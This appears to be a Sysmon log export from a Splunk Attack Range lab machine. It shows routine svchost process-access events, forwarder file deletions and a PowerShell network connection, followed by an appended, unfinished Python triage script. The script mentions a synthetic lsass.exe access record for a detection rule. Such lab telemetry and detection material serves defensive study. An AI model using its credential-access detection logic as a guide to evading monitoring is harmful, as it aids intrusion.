Rec=36497923; EventID=10 ProcessAccess; UtcTime=2021-09-14 13:19:59.589; SourceProcessGUID={B81B27B7-4012-611D-0D00-00000000C801}; SourceProcessId=792; SourceThreadId=812; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={B81B27B7-4133-611D-AB00-00000000C801}; TargetProcessId=4564; TargetImage=C:\Windows\Explorer.EXE; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
Rec=36497922; EventID=10 ProcessAccess; UtcTime=2021-09-14 13:19:59.589; SourceProcessGUID={B81B27B7-4012-611D-0D00-00000000C801}; SourceProcessId=792; SourceThreadId=812; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={B81B27B7-4133-611D-AB00-00000000C801}; TargetProcessId=4564; TargetImage=C:\Windows\Explorer.EXE; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
Rec=36497921; EventID=10 ProcessAccess; UtcTime=2021-09-14 13:19:59.589; SourceProcessGUID={B81B27B7-4012-611D-0D00-00000000C801}; SourceProcessId=792; SourceThreadId=812; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={B81B27B7-4133-611D-AB00-00000000C801}; TargetProcessId=4564; TargetImage=C:\Windows\Explorer.EXE; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
Rec=36497920; EventID=10 ProcessAccess; UtcTime=2021-09-14 13:19:59.589; SourceProcessGUID={B81B27B7-4012-611D-0D00-00000000C801}; SourceProcessId=792; SourceThreadId=812; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={B81B27B7-4133-611D-AB00-00000000C801}; TargetProcessId=4564; TargetImage=C:\Windows\Explorer.EXE; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
Rec=36497919; EventID=10 ProcessAccess; UtcTime=2021-09-14 13:19:59.588; SourceProcessGUID={B81B27B7-4012-611D-0D00-00000000C801}; SourceProcessId=792; SourceThreadId=812; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={B81B27B7-4133-611D-AB00-00000000C801}; TargetProcessId=4564; TargetImage=C:\Windows\Explorer.EXE; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
Rec=36497918; EventID=10 ProcessAccess; UtcTime=2021-09-14 13:19:59.588; SourceProcessGUID={B81B27B7-4012-611D-0D00-00000000C801}; SourceProcessId=792; SourceThreadId=812; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={B81B27B7-4133-611D-AB00-00000000C801}; TargetProcessId=4564; TargetImage=C:\Windows\Explorer.EXE; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000036497917Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:19:59.588{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497916Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.588{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497915Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:19:59.588{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497914Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.588{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497913Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:19:59.588{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497912Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.588{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497911Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:19:59.588{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497910Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.588{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497909Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:19:59.588{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497908Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.588{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497907Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:19:59.588{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497906Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.587{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497905Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:19:59.587{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497904Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.587{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497903Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:19:59.587{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497902Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.587{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497901Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:19:59.587{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497900Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.587{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497899Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:19:59.587{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497898Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.587{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497897Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:19:59.587{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036497930Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:00.669{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E8FEF83DD662DED04D1E0D09E808A82,SHA256=01BC053FC8A4B384E5C27256CB1DB78396E67496DBCB159335483E9BC62130C2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497933Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:01.687{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E3B990D96751C28A632DB160ADEDD42,SHA256=CB6333A4451520B95D0117C0370041FE2CE84B21AE177E2659EE8A0154D0E508,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497932Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:20:31.509{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50595-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497931Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:01.006{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CEDD9C8FF3600F505A726CCE99345146,SHA256=184E81FF0C1881AD1BB590B8F5A11BF6FCA681E4F8F37556F74B7FABE6DE55DD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497934Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:02.704{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=060C93BA88FABDBC036FE30F94501E22,SHA256=6A03E4E6DCE6FC81EB3E7B7B518DEE9202E99B48120D348BC9F16A05498F9BE6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497935Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:03.719{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=864F6A906AD14712F965BD5FB9BD51E5,SHA256=A6AD455B70FB67D95BF716880E85341ECA24ADA1D68878BB6EFD8D388695039D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
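Two record types in this export are worth scripting against: the Event ID 3 NetworkConnect above (powershell.exe run by ATTACKRANGE\REED_SCHMIDT initiating a session to 10.0.1.16:443) and the Event ID 10 ProcessAccess flood earlier in this section, where rpcss.dll inside svchost.exe opens Explorer.EXE and ShellExperienceHost.exe with GrantedAccess 0x1000 (PROCESS_QUERY_LIMITED_INFORMATION), a read-only handle that is routine RPC housekeeping and not a sign of injection. The following triage script is an added example, not part of the original log export or of Splunk Attack Range. Its sample records are constructed to mirror the field values of those events (the lsass.exe record and the C:\Users\Public\tool.exe path are synthetic, added only so the ProcessAccess rule has a positive case); the Sysmon XML namespace is omitted from the samples, so the parser matches on local tag names, and the SCRIPT_HOSTS set is a heuristic choice, not something the export defines.

```python
"""Triage for Sysmon Event ID 3 (NetworkConnect) and Event ID 10 (ProcessAccess).

Added example, not part of the original log export.  SAMPLE_EVENTS are constructed
records mirroring values in the dump; the Sysmon XML namespace is omitted.
"""
import ntpath
import xml.etree.ElementTree as ET
from typing import Dict, List, Tuple

# Process access rights from winnt.h, used to decode the GrantedAccess mask.
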